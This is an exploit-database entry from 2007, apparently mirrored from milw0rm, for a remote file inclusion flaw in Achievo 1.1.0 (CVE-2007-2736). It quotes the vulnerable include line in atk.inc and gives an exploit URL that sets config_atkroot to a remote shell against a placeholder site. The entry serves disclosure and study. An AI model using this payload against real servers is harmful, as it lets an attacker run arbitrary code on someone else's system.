Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion
| EKU-ID: 11891 | CVE: OSVDB-37919;CVE-2007-2736 | OSVDB-ID: |
| Author: Katatafish | Published: 2007-05-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 11891 | CVE: OSVDB-37919;CVE-2007-2736 | OSVDB-ID: |
| Author: Katatafish | Published: 2007-05-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
## Achievo 1.1.0(index.php) Remote File Include Vulnerability ## #Found by : Katatafish (karatatata@hush.com) #Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz # File: ./atk.inc include_once($config_atkroot."atk/modules/class.atkmodule.inc"); # Exploit http://site.com/[path]/index.php?config_atkroot=SHELL # milw0rm.com [2007-05-15]